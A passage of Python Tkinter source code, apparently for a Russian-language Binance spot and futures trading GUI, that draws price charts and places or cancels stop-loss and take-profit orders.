PSDvar.set('LONG')
self.PSDvar_L = Radiobutton(text="L", command=lambda i='LONG': self.PSDvar_Ch(i), variable=PSDvar, value='LONG',indicatoron=0)
self.PSDvar_S = Radiobutton(text="S", command=lambda i='SHORT': self.PSDvar_Ch(i), variable=PSDvar, value='SHORT',indicatoron=0)
self.PSDvar_L.place(height=30,width=30,x=510,y=190)
self.PSDvar_S.place(height=30,width=30,x=510,y=190)
#_______________MIDDLE-EXTRA SIDE END
#_______________MIDDLE SIDE START
MPSLvar=StringVar()
MPSL_list = ['TICK', 'CANDLE 1m', 'CANDLE 5m', 'CANDLE 15m', 'CANDLE 30m', 'CANDLE 1h', 'CANDLE 4h', 'CANDLE 1d', 'CANDLE SUMM']
MPSLvar.set(MPSL_list[2])
self.GRSL = OptionMenu(root,MPSLvar,*MPSL_list,command=self.graph_selected)
self.GRSL.place(height=30,width=150,x=210,y=120)
#__TICK/CANDLE/... start/stop button - start/stop timer
self.button_1 = Button(root, text="Включить", command=click_button1)
self.button_1.place(height=30,width=200,x=470,y=120)
CYPvar=StringVar()
CYP_list = ['-50%', '-40%', '-30%', '-20%', '-10%', '0%', '+10%', '+20%', '+30%', '+40%', '+50%']
CYPvar.set(CYP_list[5])
self.Option_CYP = OptionMenu(root,CYPvar,*CYP_list,command=self.OptionCYP_selected)
self.Option_CYP.place(height=30,width=100,x=370,y=120)
#__Third Market graph - Summ Candles Market trades
self.graph_Sm=Canvas(root, borderwidth=2)
self.graph_Sm.place(height=500,width=510,x=10,y=150)
self.graph_Sm.configure(scrollregion=(-500,-500,1000,1000))
#__First Market graph - TICK Market trades
self.graph_1=Canvas(root, borderwidth=2)
self.graph_1.place(height=500,width=510,x=10,y=150)
self.graph_1.configure(scrollregion=(-500,-500,1000,1000))
#__Second Market graph - Candles Market trades
self.graph_Cn=Canvas(root, borderwidth=2)
self.graph_Cn.place(height=500,width=510,x=10,y=150)
self.graph_Cn.configure(scrollregion=(-500,-500,1000,1000))
#__TEST PAINTING START
y_axe=[]
yy=(10,10)
y_axe.append(yy)
yy=(10,180)
y_axe.append(yy)
self.graph_1.create_line(y_axe,fill="black",smooth=1)
x_axe=[]
xx=(10,180)
x_axe.append(xx)
xx=(230,180)
x_axe.append(xx)
self.graph_1.create_line(x_axe,fill="black",smooth=1)
y_axe=[]
yy=(10,250)
y_axe.append(yy)
yy=(250,250)
y_axe.append(yy)
self.graph_Cn.create_line(y_axe,fill="black",smooth=1)
x_axe=[]
xx=(250,250)
x_axe.append(xx)
xx=(250,100)
x_axe.append(xx)
self.graph_Cn.create_line(x_axe,fill="black",smooth=1)
#__TEST PAINTING END
#__Second Order graph - Zoom orders
self.graph_Zm=Canvas(root, borderwidth=2)
#self.graph_Zm.place(height=200,width=100,x=410,y=150)
self.graph_Zm.configure(scrollregion=(0,-500,100,1000))
#__First Orders graph - Market orders
self.graph_2=Canvas(root, borderwidth=2)
self.graph_2.place(height=200,width=100,x=410,y=150)
self.graph_2.configure(scrollregion=(0,-500,100,1000))
#__First scale graph - Top timer
self.graph_Tb=Canvas(root, borderwidth=2,bg="darkgray")
self.graph_Tb.place(height=30,width=510,x=10,y=150)
self.graph_Tb.configure(scrollregion=(-500,0,1000,70))
#__Second scale graph - Bottom timer
self.graph_Td=Canvas(root, borderwidth=2,bg="darkgray")
self.graph_Td.place(height=30,width=510,x=10,y=500)
self.graph_Td.configure(scrollregion=(-500,0,1000,70))
#__Vert Volume scale graph - Volumes
self.graph_VV = Canvas(root, borderwidth=2,bg="white")
self.graph_VV.place(height=100,width=510,x=10,y=450)
self.graph_VV.configure(scrollregion=(-500,0,1000,100))
#__BTC/USDT delta
self.graph_BTCD = Canvas(root, borderwidth=2,bg="white")
self.graph_BTCD.place(height=100,width=510,x=10,y=180)
self.graph_BTCD.configure(scrollregion=(-500,0,1000,100))
#__Zoom button
self.button_Ord = Button(root, text="Вкл. Zoom", command=click_button_Zm)
self.button_Ord.place(height=30,width=100,x=410,y=150)
#__Start/stop button
self.button_OrdTmr = Button(root, text="Вкл. ордера", command=click_button_OrdTmr)
self.button_OrdTmr.place(height=30,width=100,x=510,y=150)
#__Graphs BINDS
self.graph_1.bind("<ButtonPress-1>", self.button1_press)
self.graph_1.bind("<ButtonRelease-1>",self.button1_release)
self.graph_Cn.bind("<ButtonPress-1>", self.button10_press)
self.graph_Cn.bind("<ButtonRelease-1>",self.button10_release)
self.graph_Sm.bind("<ButtonPress-1>", self.buttonSm_press)
self.graph_Sm.bind("<ButtonRelease-1>",self.buttonSm_release)
self.graph_Zm.bind("<ButtonRelease-1>",self.buttonZm_release)
self.Scale_TP.bind("<MouseWheel>",self.Scale_TP_MW)
self.Scale_SL.bind("<MouseWheel>",self.Scale_SL_MW)
self.Tree_Pos.bind("<Button-1>",self.Tree_Pos_click)
#_______________MIDDLE SIDE END
def Sys_Msg(self,text1):
time_local_int = int(time.mktime(time.localtime()))
time_local_time = datetime.datetime.fromtimestamp(time_local_int)
time_local_str=time_local_time.strftime("[%d.%m.%Y %H:%M:%S] ")
sys_msg = '\n' + str(time_local_str) + text1
app.text_Sys.insert(END, sys_msg)
app.text_Sys.yview(END)
def OrdSz_Ch(self,i):
global OrdSz
OrdSz.set(i)
app.text_QOrd.delete(1.0,END)
if i > 1:
k1 = "%.1f" % (float(float(i)/float(Lvrg)))
app.text_QOrd.insert(1.0, k1)
else:
BnFAcc = bot.futuresBalance()
if len(BnFAcc)>0:
for mm in range (len(BnFAcc)):
BnFAcc1 = BnFAcc[mm]
if BnFAcc1['asset'] == 'USDT':
wa = float(BnFAcc1['withdrawAvailable'])
wa = wa*i
app.text_QOrd.insert(1.0, "%.2f" % (wa))
#print(OrdSz.get())
def PSDvar_Ch(self,i):
global PosSide
global PSDvar
PSDvar.set(i)
PosSide = i
if PosSide =='LONG':
app.Scale_TP.config(bg='lightgreen')
app.Scale_SL.config(bg='lightpink')
app.button_PSL.config (fg='red')
app.button_PSLR.config(fg='red')
app.button_PTP.config(fg='green')
app.button_PTPR.config(fg='green')
elif PosSide =='SHORT':
app.Scale_TP.config(bg='lightpink')
app.Scale_SL.config(bg='lightgreen')
app.button_PSL.config (fg='green')
app.button_PSLR.config(fg='green')
app.button_PTP.config(fg='red')
app.button_PTPR.config(fg='red')
#print(PosSide)
#__Событие левый клик мыши на виджете Tree_Pos
def Tree_Pos_click(self,event):
#print(should_run_T,should_run_C,should_run_S)
if should_run_T == False and should_run_C == False and should_run_S == False:
Tr_item_0 = app.Tree_Pos.identify('item',event.x,event.y)
TP_CL=app.Tree_Pos.get_children()
TP_CC=len(TP_CL)
if int(TP_CC) > 0:
#print(len(Tr_item_0))
if len(Tr_item_0) > 0:
if int(Tr_item_0[0]) <= int(TP_CC) and int(Tr_item_0[0]) > 0:
#print(Tr_item_0[0])
#print(app.Tree_Pos.item(Tr_item_0[0])['values'])
Tr_item_1 = app.Tree_Pos.item(Tr_item_0[0])['values']
Tr_item_2 = str(Tr_item_1[1])
#print('.',Tr_item_2,'.')
if MS == 'SPOT':
for ij in range(len(mylist10)):
if mylist10[ij] == Tr_item_2.strip():
app.CB_P.current(ij)
if MS == 'FUTURES':
for ij in range(len(mylist20)):
if mylist20[ij] == Tr_item_2.strip():
app.CB_P.current(ij)
#app.CB_P.set(Tr_item_2) - не работает
def click_button_PSL(self):
global PEP,PSP_Tmp
global should_run_C
global prSt
if should_run_C == True and MS=='FUTURES' and PosSide=='LONG':
BnFAcc=bot.userOpenOrders()
if len(BnFAcc)>0:
for mm in range (len(BnFAcc)):
BnFAcc1 = BnFAcc[mm]
if str(BnFAcc1['symbol'])==grSmb and str(BnFAcc1['origType'])=='STOP_MARKET' and str(BnFAcc1['type'])=='STOP_MARKET' and str(BnFAcc1['positionSide'])=='LONG':
PSP_Rem = float(BnFAcc1['stopPrice'])
bot.futuresCancelOrder(symbol=grSmb,orderId=BnFAcc1['orderId'])
sys_msg = ' Позиция LONG Ордер Stop-Loss удалён [' + grSmb + '], Цена: ' + str(PSP_Rem) + ' USDT.'
app.Sys_Msg(text1=sys_msg)
if prSt >= 0.1:
PSP_Tmp_str = "%.2f" % (PSP_Tmp)
elif 0.1 > prSt >= 0.01:
PSP_Tmp_str = "%.2f" % (PSP_Tmp)
elif 0.01 > prSt >= 0.001:
PSP_Tmp_str = "%.3f" % (PSP_Tmp)
elif 0.001 > prSt >= 0.0001:
PSP_Tmp_str = "%.4f" % (PSP_Tmp)
elif 0.00001 <= prSt < 0.0001:
PSP_Tmp_str = "%.5f" % (PSP_Tmp)
elif 0.000001 <= prSt < 0.00001:
PSP_Tmp_str = "%.6f" % (PSP_Tmp)
elif 0.0000001 <= prSt < 0.000001:
PSP_Tmp_str = "%.7f" % (PSP_Tmp)
elif prSt < 0.0000001:
PSP_Tmp_str = "%.8f" % (PSP_Tmp)
bot.futuresCreateOrder(symbol=grSmb, recvWindow=5000, side='SELL', positionSide='LONG', type='STOP_MARKET', timeInForce='GTE_GTC', stopPrice=PSP_Tmp_str,closePosition=True,workingType='MARK_PRICE', newOrderRespType='FULL')
sys_msg = ' Позиция LONG Ордер Stop-Loss размещён [' + grSmb + '], Цена: ' + str(PSP_Tmp_str) + ' USDT.'
app.Sys_Msg(text1=sys_msg)
if should_run_C == True and MS=='FUTURES' and PosSide=='SHORT':
BnFAcc=bot.userOpenOrders()
if len(BnFAcc)>0:
for mm in range (len(BnFAcc)):
BnFAcc1 = BnFAcc[mm]
if str(BnFAcc1['symbol'])==grSmb and str(BnFAcc1['origType'])=='TAKE_PROFIT_MARKET' and str(BnFAcc1['type'])=='TAKE_PROFIT_MARKET' and str(BnFAcc1['positionSide'])=='SHORT':
PSP_Rem = float(BnFAcc1['stopPrice'])
bot.futuresCancelOrder(symbol=grSmb,orderId=BnFAcc1['orderId'])
sys_msg = ' Позиция SHORT Ордер Take-Profit удалён [' + grSmb + '], Цена: ' + str(PSP_Rem) + ' USDT.'
app.Sys_Msg(text1=sys_msg)
if prSt >= 0.1:
PSP_Tmp_str = "%.2f" % (PSP_Tmp)
elif 0.1 > prSt >= 0.01:
PSP_Tmp_str = "%.2f" % (PSP_Tmp)
elif 0.01 > prSt >= 0.001:
PSP_Tmp_str = "%.3f" % (PSP_Tmp)
elif 0.001 > prSt >= 0.0001:
PSP_Tmp_str = "%.4f" % (PSP_Tmp)
elif 0.00001 <= prSt < 0.0001:
PSP_Tmp_str = "%.5f" % (PSP_Tmp)
elif 0.000001 <= prSt < 0.00001:
PSP_Tmp_str = "%.6f" % (PSP_Tmp)
elif 0.0000001 <= prSt < 0.000001:
PSP_Tmp_str = "%.7f" % (PSP_Tmp)
elif prSt < 0.0000001:
PSP_Tmp_str = "%.8f" % (PSP_Tmp)
bot.futuresCreateOrder(symbol=grSmb, recvWindow=5000, side='BUY', positionSide='SHORT', type='TAKE_PROFIT_MARKET', timeInForce='GTE_GTC', stopPrice=PSP_Tmp_str,closePosition=True,workingType='MARK_PRICE', newOrderRespType='FULL')
sys_msg = ' Позиция SHORT Ордер Take-Profit размещён [' + grSmb + '], Цена: ' + str(PSP_Tmp_str) + ' USDT.'
app.Sys_Msg(text1=sys_msg)
def click_button_PSLR(self):
global PEP
global should_run_C
if should_run_C == True and MS=='FUTURES' and PosSide=='LONG':
BnFAcc=bot.userOpenOrders()
if len(BnFAcc)>0:
for mm in range (len(BnFAcc)):
BnFAcc1 = BnFAcc[mm]
if str(BnFAcc1['symbol'])==grSmb and str(BnFAcc1['origType'])=='STOP_MARKET' and str(BnFAcc1['type'])=='STOP_MARKET' and str(BnFAcc1['positionSide'])=='LONG':
PSP_Rem = float(BnFAcc1['stopPrice'])
#print(BnFAcc1['clientOrderId'], ' , ',BnFAcc1['orderId'])
app.Scale_SL.set (-float((100-(float(PSP_Rem)/float(PEP))*100)*float(Lvrg)))
bot.futuresCancelOrder(symbol=grSmb,orderId=BnFAcc1['orderId'])
sys_msg = ' Позиция LONG Ордер Stop-Loss удалён [' + grSmb + '], Цена: ' + str(PSP_Rem) + ' USDT.'
app.Sys_Msg(text1=sys_msg)
if should_run_C == True and MS=='FUTURES' and PosSide=='SHORT':
BnFAcc=bot.userOpenOrders()
if len(BnFAcc)>0:
for mm in range (len(BnFAcc)):
BnFAcc1 = BnFAcc[mm]
if str(BnFAcc1['symbol'])==grSmb and str(BnFAcc1['origType'])=='TAKE_PROFIT_MARKET' and str(BnFAcc1['type'])=='TAKE_PROFIT_MARKET' and str(BnFAcc1['positionSide'])=='SHORT':
PSP_Rem = float(BnFAcc1['stopPrice'])
#print(BnFAcc1['clientOrderId'], ' , ',BnFAcc1['orderId'])
app.Scale_SL.set (-float((100-(float(PSP_Rem)/float(PEP))*100)*float(Lvrg)))
bot.futuresCancelOrder(symbol=grSmb,orderId=BnFAcc1['orderId'])
sys_msg = ' Позиция SHORT Ордер Take-Profit удалён [' + grSmb + '], Цена: ' + str(PSP_Rem) + ' USDT.'
app.Sys_Msg(text1=sys_msg)
def click_button_PTP(self):
global PPP_Tmp
global should_run_C
global prSt
if should_run_C == True and MS=='FUTURES' and PosSide=='LONG':
BnFAcc=bot.userOpenOrders()
if len(BnFAcc)>0:
for mm in range (len(BnFAcc)):
BnFAcc1 = BnFAcc[mm]
if str(BnFAcc1['symbol'])==grSmb and str(BnFAcc1['origType'])=='TAKE_PROFIT_MARKET' and str(BnFAcc1['type'])=='TAKE_PROFIT_MARKET' and str(BnFAcc1['positionSide'])=='LONG':
PSP_Rem = float(BnFAcc1['stopPrice'])
#print(BnFAcc1['clientOrderId'], ' , ',BnFAcc1['orderId'])
#print(BnFAcc1)
bot.futuresCancelOrder(symbol=grSmb,orderId=BnFAcc1['orderId'])
sys_msg = ' Позиция LONG Ордер Take-Profit удалён [' + grSmb + '], Цена: ' + str(PSP_Rem) + ' USDT.'
app.Sys_Msg(text1=sys_msg)
if prSt >= 0.1:
PPP_Tmp_str = "%.2f" % (PPP_Tmp)
elif 0.1 > prSt >= 0.01:
PPP_Tmp_str = "%.2f" % (PPP_Tmp)
elif 0.01 > prSt >= 0.001:
PPP_Tmp_str = "%.3f" % (PPP_Tmp)
elif 0.001 > prSt >= 0.0001:
PPP_Tmp_str = "%.4f" % (PPP_Tmp)
elif 0.00001 <= prSt < 0.0001:
PPP_Tmp_str = "%.5f" % (PPP_Tmp)
elif 0.000001 <= prSt < 0.00001:
PPP_Tmp_str = "%.6f" % (PPP_Tmp)
elif 0.0000001 <= prSt < 0.000001:
PPP_Tmp_str = "%.7f" % (PPP_Tmp)
elif prSt < 0.0000001:
PPP_Tmp_str = "%.8f" % (PPP_Tmp)
bot.futuresCreateOrder(symbol=grSmb, recvWindow=5000, side='SELL', positionSide='LONG', type='TAKE_PROFIT_MARKET', timeInForce='GTE_GTC', stopPrice=PPP_Tmp_str,closePosition=True,workingType='MARK_PRICE', newOrderRespType='FULL')
sys_msg = ' Позицич LONG Ордер Take-Profit размещён [' + grSmb + '], Цена: ' + str(PPP_Tmp_str) + ' USDT.'
app.Sys_Msg(text1=sys_msg)
if should_run_C == True and MS=='FUTURES' and PosSide=='SHORT':
BnFAcc=bot.userOpenOrders()
if len(BnFAcc)>0:
for mm in range (len(BnFAcc)):
BnFAcc1 = BnFAcc[mm]
if str(BnFAcc1['symbol'])==grSmb and str(BnFAcc1['origType'])=='STOP_MARKET' and str(BnFAcc1['type'])=='STOP_MARKET' and str(BnFAcc1['positionSide'])=='SHORT':
PSP_Rem = float(BnFAcc1['stopPrice'])
#print(BnFAcc1['clientOrderId'], ' , ',BnFAcc1['orderId'])
#print(BnFAcc1)
bot.futuresCancelOrder(symbol=grSmb,orderId=BnFAcc1['orderId'])
sys_msg = ' Позиция SHORT Ордер Stop-Loss удалён [' + grSmb + '], Цена: ' + str(PSP_Rem) + ' USDT.'
app.Sys_Msg(text1=sys_msg)
if prSt >= 0.1:
PPP_Tmp_str = "%.2f" % (PPP_Tmp)
elif 0.1 > prSt >= 0.01:
PPP_Tmp_str = "%.2f" % (PPP_Tmp)
elif 0.01 > prSt >= 0.001:
PPP_Tmp_str = "%.3f" % (PPP_Tmp)
elif 0.001 > prSt >= 0.0001:
PPP_Tmp_str = "%.4f" % (PPP_Tmp)
elif 0.00001 <= prSt < 0.0001:
PPP_Tmp_str = "%.5f" % (PPP_Tmp)
elif 0.000001 <= prSt < 0.00001:
PPP_Tmp_str = "%.6f" % (PPP_Tmp)
elif 0.0000001 <= prSt < 0.000001:
PPP_Tmp_str = "%.7f" % (PPP_Tmp)
elif prSt < 0.0000001:
PPP_Tmp_str = "%.8f" % (PPP_Tmp)
bot.futuresCreateOrder(symbol=grSmb, recvWindow=5000, side='BUY', positionSide='SHORT', type='STOP_MARKET', timeInForce='GTE_GTC', stopPrice=PPP_Tmp_str,closePosition=True,workingType='MARK_PRICE', newOrderRespType='FULL')
sys_msg = ' Позиция SHORT Ордер Stop-Loss размещён [' + grSmb + '], Цена: ' + str(PPP_Tmp_str) + ' USDT.'
app.Sys_Msg(text1=sys_msg)
def click_button_PTPR(self):
global PEP
global should_run_C
if should_run_C == True and MS=='FUTURES' and PosSide=='LONG':
BnFAcc=bot.userOpenOrders()
if len(BnFAcc)>0:
for mm in range (len(BnFAcc)):
BnFAcc1 = BnFAcc[mm]
if str(BnFAcc1['symbol'])==grSmb and str(BnFAcc1['origType'])=='TAKE_PROFIT_MARKET' and str(BnFAcc1['type'])=='TAKE_PROFIT_MARKET' and str(BnFAcc1['positionSide'])=='LONG':
PSP_Rem = float(BnFAcc1['stopPrice'])
#print(BnFAcc1['clientOrderId'], ' , ',BnFAcc1['orderId'])
app.Scale_TP.set (-float((100-(float(PSP_Rem)/float(PEP))*100)*float(Lvrg)))
bot.futuresCancelOrder(symbol=grSmb,orderId=BnFAcc1['orderId'])
sys_msg = ' Позиция LONG Ордер Take-Profit удалён [' + grSmb + '], Цена: ' + str(PSP_Rem) + ' USDT.'
app.Sys_Msg(text1=sys_msg)
if should_run_C == True and MS=='FUTURES' and PosSide=='SHORT':
BnFAcc=bot.userOpenOrders()
if len(BnFAcc)>0:
for mm in range (len(BnFAcc)):
BnFAcc1 = BnFAcc[mm]
if str(BnFAcc1['symbol'])==grSmb and str(BnFAcc1['origType'])=='STOP_MARKET' and str(BnFAcc1['type'])=='STOP_MARKET' and str(BnFAcc1['positionSide'])=='SHORT':
PSP_Rem = float(BnFAcc1['stopPrice'])
#print(BnFAcc1['clientOrderId'], ' , ',BnFAcc1['orderId'])
app.Scale_TP.set (-float((100-(float(PSP_Rem)/float(PEP))*100)*float(Lvrg)))
bot.futuresCancelOrder(symbol=grSmb,orderId=BnFAcc1['orderId'])
sys_msg = ' Позиция SHORT Ордер Stop-Loss удалён [' + grSmb + '], Цена: ' + str(PSP_Rem) + ' USDT.'
app.Sys_Msg(text1=sys_msg)
#__Событие прокрутка колеса мыши на виджете Scale_TP
def Scale_TP_MW(self,event):
#print ('MW', event.num, event.delta)
if event.num == 5 or event.delta <= -120:
if app.Scale_TP.get() == -100:
app.Scale_TP.configure (to=-450,from_=-100)
elif app.Scale_TP.get() == -450:
app.Scale_TP.configure (to=-800,from_=-450)
elif app.Scale_TP.get() == 700:
app.Scale_TP.configure (to=350,from_=700)
elif app.Scale_TP.get() == 350:
app.Scale_TP.configure (to=-100,from_=350)
app.Scale_TP.set(app.Scale_TP.get()-0.1)
if event.num == 4 or event.delta >= 120:
if app.Scale_TP.get() == 350:
app.Scale_TP.configure (to=350,from_=700)
elif app.Scale_TP.get() == 700:
app.Scale_TP.configure (to=700,from_=1050)
elif app.Scale_TP.get() == -100:
app.Scale_TP.configure (to=-100,from_=350)
elif app.Scale_TP.get() == -450:
app.Scale_TP.configure (to=-450,from_=-100)
app.Scale_TP.set(app.Scale_TP.get()+0.1)
#__Событие прокрутка колеса мыши на виджете Scale_SL
def Scale_SL_MW(self,event):
#print ('MW', event.num, event.delta)
if event.num == 5 or event.delta <= -120:
if app.Scale_SL.get() == -100:
app.Scale_SL.configure (to=-450,from_=-100)
elif app.Scale_SL.get() == -450:
app.Scale_SL.configure (to=-800,from_=-450)
elif app.Scale_SL.get() == 700:
app.Scale_SL.configure (to=350,from_=700)
elif app.Scale_SL.get() == 350:
app.Scale_SL.configure (to=-100,from_=350)
app.Scale_SL.set(app.Scale_SL.get()-0.1)
if event.num == 4 or event.delta >= 120:
if app.Scale_SL.get() == 350:
app.Scale_SL.configure (to=350,from_=700)
elif app.Scale_SL.get() == 700:
app.Scale_SL.configure (to=700,from_=1050)
elif app.Scale_SL.get() == -100:
app.Scale_SL.configure (to=-100,from_=350)
elif app.Scale_SL.get() == -450:
app.Scale_SL.configure (to=-450,from_=-100)
app.Scale_SL.set(app.Scale_SL.get()+0.1)
#__Событие изменения значения виджета Scale_TP
def Scale_TP_change(self,value):
global PPP_Tmp
if MS == 'FUTURES' and should_run_C == True and PEP > 0 and PosSide=='LONG':
yyC =((100+(float(value)/float(Lvrg)))/100)*float(PEP)
PPP_Tmp = yyC
#print(yyC,' - ', y0I_TP, ' - ', float(PEP))
yyC = grMd - ((yyC-y0I_TP)/(prSt*10))* grSt
#print(grMd, ' - ',yyC,' - ', y0I_TP,' - ', float(PEP), ' - ', value)
PnL_dif = -(PEP * PPA - PPP_Tmp * PPA)
app.graph_Cn.coords(GPPP_Tmp, -500,yyC,800,yyC)
app.graph_Cn.coords(GPPP_Tmp_txt,900,yyC)
app.graph_Cn.itemconfigure(GPPP_Tmp_txt,text='Цена: ' + str(PPP_Tmp) + '\n' + "%.2f" % (PnL_dif) + ' USDT')
if MS == 'FUTURES' and should_run_C == True and PEP > 0 and PosSide=='SHORT':
yyC =((100+(float(value)/float(Lvrg)))/100)*float(PEP)
PPP_Tmp = yyC
#print(yyC,' - ', y0I_TP, ' - ', float(PEP))
yyC = grMd - ((yyC-y0I_TP)/(prSt*10))* grSt
#print(grMd, ' - ',yyC,' - ', y0I_TP,' - ', float(PEP), ' - ', value)
PnL_dif = -(PEP * PPA - PPP_Tmp * PPA)
app.graph_Cn.coords(GPSP_Tmp, -500,yyC,800,yyC)
app.graph_Cn.coords(GPSP_Tmp_txt,900,yyC)
app.graph_Cn.itemconfigure(GPSP_Tmp_txt,text='Цена: ' + str(PPP_Tmp) + '\n' + "%.2f" % (PnL_dif) + ' USDT')
#__Событие изменения значения виджета Scale_SL
def Scale_SL_change(self,value):
global PSP_Tmp
if MS == 'FUTURES' and should_run_C == True and PEP > 0 and PosSide=='LONG':
yyC =((100+(float(value)/float(Lvrg)))/100)*float(PEP)
PSP_Tmp = yyC
#print(PSP_Tmp)
#print(yyC,' - ', y0I_TP, ' - ', float(PEP))
yyC = grMd - ((yyC-y0I_TP)/(prSt*10))* grSt
#print(grMd, ' - ',yyC,' - ', y0I_TP,' - ', float(PEP), ' - ', value)
PnL_dif = -(PEP * PPA - PSP_Tmp * PPA)
app.graph_Cn.coords(GPSP_Tmp, -500,yyC,800,yyC)
app.graph_Cn.coords(GPSP_Tmp_txt, 900,yyC)
app.graph_Cn.itemconfigure(GPSP_Tmp_txt,text='Цена: ' + str(PSP_Tmp) + '\n' + "%.2f" % (PnL_dif) + ' USDT')
#print ('SL_change',value)
if MS == 'FUTURES' and should_run_C == True and PEP > 0 and PosSide=='SHORT':
yyC =((100+(float(value)/float(Lvrg)))/100)*float(PEP)
PSP_Tmp = yyC
#print(PSP_Tmp)
#print(yyC,' - ', y0I_TP, ' - ', float(PEP))
yyC = grMd - ((yyC-y0I_TP)/(prSt*10))* grSt
#print(grMd, ' - ',yyC,' - ', y0I_TP,' - ', float(PEP), ' - ', value)
PnL_dif = -(PEP * PPA - PSP_Tmp * PPA)
app.graph_Cn.coords(GPPP_Tmp, -500,yyC,800,yyC)
app.graph_Cn.coords(GPPP_Tmp_txt, 900,yyC)
app.graph_Cn.itemconfigure(GPPP_Tmp_txt,text='Цена: ' + str(PSP_Tmp) + '\n' + "%.2f" % (PnL_dif) + ' USDT')
def OptionCYP_selected(self,choice):
global grZm
global should_run_C
grZm_choice = choice
if grZm_choice == '-50%':
grZm = 50
elif grZm_choice == '-40%':
grZm = 100
elif grZm_choice == '-30%':
grZm = 200
elif grZm_choice == '-20%':
grZm = 300
elif grZm_choice == '-10%':
grZm = 400
elif grZm_choice == '0%':
grZm = 500
elif grZm_choice == '+10%':
grZm = 600
elif grZm_choice == '+20%':
grZm = 700
elif grZm_choice == '+30%':
grZm = 800
elif grZm_choice == '+40%':
grZm = 900
elif grZm_choice == '+50%':
grZm = 1000
if GS == 'CANDLE 1m' or GS == 'CANDLE 5m' or GS == 'CANDLE 5m' or GS == 'CANDLE 15m' or GS == 'CANDLE 30m' or GS == 'CANDLE 1h' or GS == 'CANDLE 4h' or GS == 'CANDLE 1d':
if should_run_C == True:
#__Stop Timer
should_run_C = False
PS1 = True
app.button_1['font']=myFont
app.button_1.config(text="Start", fg='green')
time.sleep(0.5)
#__Restart Timer
PS1 = False
t2 = threading.Thread(target=Timer_Candle,daemon=True)
t2.start()
app.button_1.config(text="Stop", fg='red')
should_run_C = True
def button1_press(self,event):
global SxS, SyS
SxS, SyS = event.x, event.y
#print(event.x, event.y)
def button1_release(self,event):
global SxF, SyF
SxF, SyF = event.x, event.y
self.graph_1.xview_scroll(int((SxS-SxF)/20),UNITS)
self.graph_1.yview_scroll(int((SyS-SyF)/20),UNITS)
self.graph_2.yview_scroll(int((SyS-SyF)/20),UNITS)
self.graph_Tb.xview_scroll(int((SxS-SxF)/20),UNITS)
self.graph_Td.xview_scroll(int((SxS-SxF)/20),UNITS)
self.graph_VV.xview_scroll(int((SxS-SxF)/20),UNITS)
self.graph_BTCD.xview_scroll(int((SxS-SxF)/20),UNITS)
#print(event.x, event.y)
def button10_press(self,event):
global SxS, SyS
SxS, SyS = event.x, event.y
#print(event.x, event.y)
def button10_release(self,event):
global SxF, SyF
SxF, SyF = event.x, event.y
self.graph_Cn.xview_scroll(int((SxS-SxF)/20),UNITS)
self.graph_Cn.yview_scroll(int((SyS-SyF)/20),UNITS)
self.graph_2.yview_scroll(int((SyS-SyF)/20),UNITS)
self.graph_Tb.xview_scroll(int((SxS-SxF)/20),UNITS)
self.graph_Td.xview_scroll(int((SxS-SxF)/20),UNITS)
#print(event.x, event.y)
def buttonSm_press(self,event):
global SxS, SyS
SxS, SyS = event.x, event.y
#print(event.x, event.y)
def buttonSm_release(self,event):
global SxF, SyF
SxF, SyF = event.x, event.y
self.graph_Sm.xview_scroll(int((SxS-SxF)/20),UNITS)
self.graph_Sm.yview_scroll(int((SyS-SyF)/20),UNITS)
self.graph_2.yview_scroll(int((SyS-SyF)/20),UNITS)
self.graph_Tb.xview_scroll(int((SxS-SxF)/20),UNITS)
self.graph_Td.xview_scroll(int((SxS-SxF)/20),UNITS)
#print(event.x, event.y)
def buttonZm_release(self,event):
global SxF, SyF
global yI0Zm
global grH
SxF, SyF = event.x, event.y
grMd=grH/2
yy = yI0Zm +(((grMd - SyF)/25)*prSt)
#print (yy)
if prSt >= 1:
yy1 = "%.0f" % (yy)
yy2=float(yy1)
if prSt == 0.1:
yy1 = "%.1f" % (yy)
yy2=float(yy1)
#print(yy2)
elif prSt == 0.01:
yy1 = "%.2f" % (yy)
yy2=float(yy1)
#print(yy2)
elif prSt == 0.001:
yy1 = "%.3f" % (yy)
yy2=float(yy1)
elif prSt == 0.0001:
yy1 = "%.4f" % (yy)
yy2=float(yy1)
elif prSt == 0.00001:
yy1 = "%.5f" % (yy)
yy2=float(yy1)
elif prSt == 0.000001:
yy1 = "%.6f" % (yy)
yy2=float(yy1)
elif prSt == 0.0000001:
yy1 = "%.7f" % (yy)
yy2=float(yy1)
elif prSt == 0.00000001:
yy1 = "%.8f" % (yy)
yy2=float(yy1)
app.text_POrd.delete(1.0,END)
app.text_POrd.insert(1.0, yy2)
def CB_P_changed(self,event):
global SP
global grSmb
global prSt
global grSt
global grOW
global Lo
global Lvrg
global Lvrg_Tmp
global MrgT
global MrgT_Tmp
global Should_Chng
global orLSS
SP = self.CB_P.get()
self.label_P.config(text = SP)
tstr=''
orLSS=1
Should_Chng = False
app.Tree_Ord.delete(*app.Tree_Ord.get_children())
if MS == 'SPOT':
tstr = 'SPOT'
MrgT='NONE'
MrgT_Tmp='NONE'
if len(myTuplEI1)>0 and len(mylistSP)>0:
for mm in range (len(mylistSP)):
if mylistSP[mm]['symbol'] == SP:
app.Tree_PI.item(1, values=('символ',mylistSP[mm]['symbol']))
app.Tree_PI.item(2, values=('статус',mylistSP[mm]['status']))
app.Tree_PI.item(3, values=('базовая',mylistSP[mm]['baseAsset']))
app.Tree_PI.item(4, values=('котируемая',mylistSP[mm]['quoteAsset']))
app.Tree_PI.item(5, values=('маржа','-'))
app.Tree_PI.item(6, values=('тип','-'))
mylist10 = []
mylist10 = mylistSP[mm]['filters']
if len(mylist10)>0:
app.Tree_PI.item(7, values=('минЦена',mylist10[0]['minPrice']))
app.Tree_PI.item(8, values=('максЦена',mylist10[0]['maxPrice']))
app.Tree_PI.item(9, values=('шагЦены',mylist10[0]['tickSize']))
app.Tree_PI.item(10, values=('максОбъем',mylist10[2]['maxQty']))
app.Tree_PI.item(11, values=('шагОрдера',mylist10[2]['stepSize']))
prSt = float(mylist10[0]['tickSize'])
grSt = 16
grOW = 1000
grOW = float(mylist10[5]['maxQty'])
Lo=0
grSmb = SP
elif MS == 'FUTURES':
tstr = 'FUTURES'
if len(myTuplEI2)>0 and len(mylistFT)>0:
for mm in range (len(mylistFT)):
if mylistFT[mm]['symbol'] == SP:
#print(mylistFT[mm])
app.Tree_PI.item(1, values=('символ',mylistFT[mm]['symbol']))
app.Tree_PI.item(2, values=('статус',mylistFT[mm]['status']))
app.Tree_PI.item(3, values=('базовая',mylistFT[mm]['baseAsset']))
